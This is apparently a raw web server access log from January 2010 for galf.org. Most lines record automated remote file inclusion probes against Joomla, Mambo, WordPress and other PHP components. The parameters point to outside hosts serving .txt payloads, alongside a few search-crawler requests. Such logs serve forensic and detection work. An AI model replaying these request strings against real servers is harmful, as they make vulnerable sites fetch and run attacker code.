200.93.147.154 - - [18/Jan/2010:03:30:47 -0800] "GET /logs/access_091116.log%20%20//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:48 -0800] "GET /logs//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:48 -0800] "GET /logs/access_100111.log%20%20//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:30:52 -0800] "GET /logs/access_100111.log%20%20//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:31:57 -0800] "GET //administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:31:57 -0800] "GET /logs/access_091026.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:31:57 -0800] "GET /logs///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:32:10 -0800] "GET //administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:32:10 -0800] "GET /logs///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:32:10 -0800] "GET /logs/access_091026.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:32:52 -0800] "GET /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:32:52 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:32:52 -0800] "GET /logs/access_091019.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:32:52 -0800] "GET /logs/access_091019.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:33:38 -0800] "GET /logs/access_090921.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:03:33:39 -0800] "GET /logs/access_090921.log%20%20//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:34:22 -0800] "GET /logs/access_091116.log//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:34:52 -0800] "GET /logs/access_091116.log//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:34:54 -0800] "GET /class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:34:55 -0800] "GET /logs/access_091116.log//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:34:55 -0800] "GET /class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:34:59 -0800] "GET /logs//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:34:59 -0800] "GET /logs//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:35:00 -0800] "GET /logs/access_100111.log//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:35:18 -0800] "GET /logs/access_100111.log//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [18/Jan/2010:03:35:19 -0800] "GET /logs/access_100111.log//class_item.php?fileExtension=http://www.hotelmoulin.com/db/icon/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:36:10 -0800] "GET /logs/access_090615.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:03:37:19 -0800] "GET /logs/access_090615.log///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
210.205.6.130 - - [18/Jan/2010:03:40:29 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.carex.co.kr/data/rs/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
210.205.6.130 - - [18/Jan/2010:03:40:29 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.carex.co.kr/data/rs/test.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
87.230.10.251 - - [18/Jan/2010:03:43:47 -0800] "GET /logs///administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://www.samer1.net/space/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
87.230.10.251 - - [18/Jan/2010:03:43:47 -0800] "GET //administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://www.samer1.net/space/x.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
65.55.207.74 - - [18/Jan/2010:03:48:27 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.207.74 - - [18/Jan/2010:03:49:43 -0800] "GET /cendoc/?D=A HTTP/1.1" 200 526 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
200.101.70.1 - - [18/Jan/2010:04:00:28 -0800] "GET /logs/access.log//////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.101.70.1 - - [18/Jan/2010:04:00:29 -0800] "GET /////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 1051 "-" "libwww-perl/5.805" "galf.org"
200.101.70.1 - - [18/Jan/2010:04:00:30 -0800] "GET /logs//////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 4808 "-" "libwww-perl/5.805" "galf.org"
69.16.230.82 - - [18/Jan/2010:04:01:07 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:01:07 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:01:07 -0800] "GET /logs/access_090928.log///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:01:07 -0800] "GET /logs/access_091019.log///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:01:30 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:01:30 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:01:30 -0800] "GET /logs/access_090928.log%20%20///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:01:30 -0800] "GET /logs/access_091019.log%20%20///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:04:02:45 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.115.173.248 - - [18/Jan/2010:04:02:45 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [18/Jan/2010:04:03:19 -0800] "GET /administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://amir.nakib.free.fr//components/com_jombib/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [18/Jan/2010:04:03:19 -0800] "GET /logs/access_091026.log%20%20//administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://amir.nakib.free.fr//components/com_jombib/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [18/Jan/2010:04:03:19 -0800] "GET /logs//administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://amir.nakib.free.fr//components/com_jombib/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [18/Jan/2010:04:03:20 -0800] "GET /logs/access_091026.log//administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://amir.nakib.free.fr//components/com_jombib/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [18/Jan/2010:04:03:22 -0800] "GET /logs/access_091026.log//administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://amir.nakib.free.fr//components/com_jombib/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [18/Jan/2010:04:03:44 -0800] "GET /logs/access_090615.log//administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://amir.nakib.free.fr//components/com_jombib/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [18/Jan/2010:04:03:46 -0800] "GET /logs/access_090615.log//administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://amir.nakib.free.fr//components/com_jombib/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.248.104.130 - - [18/Jan/2010:04:05:00 -0800] "GET /logs/access_091207.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
125.248.104.130 - - [18/Jan/2010:04:05:00 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
125.248.104.130 - - [18/Jan/2010:04:05:01 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:05:24 -0800] "GET //index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:05:25 -0800] "GET /logs/access_090720.log///index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:05:25 -0800] "GET /logs///index.php?option=com_zoom&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:11:48 -0800] "GET /logs///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:11:48 -0800] "GET /logs/access_090810.log///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:11:49 -0800] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [18/Jan/2010:04:12:09 -0800] "GET /logs/access_091026.log///components/com_sitemap/sitemap.php?mosConfig_admin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:04:12:13 -0800] "GET /logs/access_100111.log//////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:04:12:13 -0800] "GET /////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 1051 "-" "libwww-perl/5.805" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:04:12:14 -0800] "GET /logs//////?mosConfig_absolute_path=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 200 4808 "-" "libwww-perl/5.805" "www.galf.org"
125.248.104.130 - - [18/Jan/2010:04:13:57 -0800] "GET /logs/access_091221.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://art.srru.ac.th/images/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:04:15:26 -0800] "GET /logs/access_090831.log/errors.php?error=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
218.149.85.32 - - [18/Jan/2010:04:15:48 -0800] "GET /appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:15:50 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:15:50 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:15:50 -0800] "GET /logs/access_091019.log%20%20///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:15:50 -0800] "GET /logs/access_090928.log%20%20///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [18/Jan/2010:04:15:52 -0800] "GET /logs/access_091207.log%20%20//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [18/Jan/2010:04:15:52 -0800] "GET /logs//appserv/main.php?appserv_root=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:11 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:11 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:11 -0800] "GET /logs/access_091109.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:12 -0800] "GET /administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:12 -0800] "GET /logs/access_091109.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:12 -0800] "GET /logs//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:40 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:41 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:16:45 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:16:46 -0800] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:16:46 -0800] "GET /logs/access_090928.log///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [18/Jan/2010:04:16:46 -0800] "GET /logs/access_091019.log///include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:51 -0800] "GET /logs/access_091109.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:16:51 -0800] "GET /logs/access_090921.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:17:01 -0800] "GET /logs/access_091102.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:17:23 -0800] "GET /logs/access_091109.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:17:23 -0800] "GET /logs/access_090921.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.90.50.4 - - [18/Jan/2010:04:17:44 -0800] "GET /logs/access_091102.log//administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://nuama.org/components/com_comprofiler/js/krx1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.45.123.132 - - [18/Jan/2010:04:18:05 -0800] "GET /logs/access_090831.log/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://conexionw.com/editor/idbrac.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:18:34 -0800] "GET /logs///index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:18:34 -0800] "GET /logs/access_091012.log///index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:18:35 -0800] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [18/Jan/2010:04:18:46 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [18/Jan/2010:04:18:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.80.108.81 - - [18/Jan/2010:04:18:46 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [18/Jan/2010:04:20:08 -0800] "GET /skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [18/Jan/2010:04:20:09 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.128.28.202 - - [18/Jan/2010:04:20:09 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dscontrol.co.kr/data/members/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:20:53 -0800] "GET /logs///index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.135.42.60 - - [18/Jan/2010:04:20:53 -0800] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
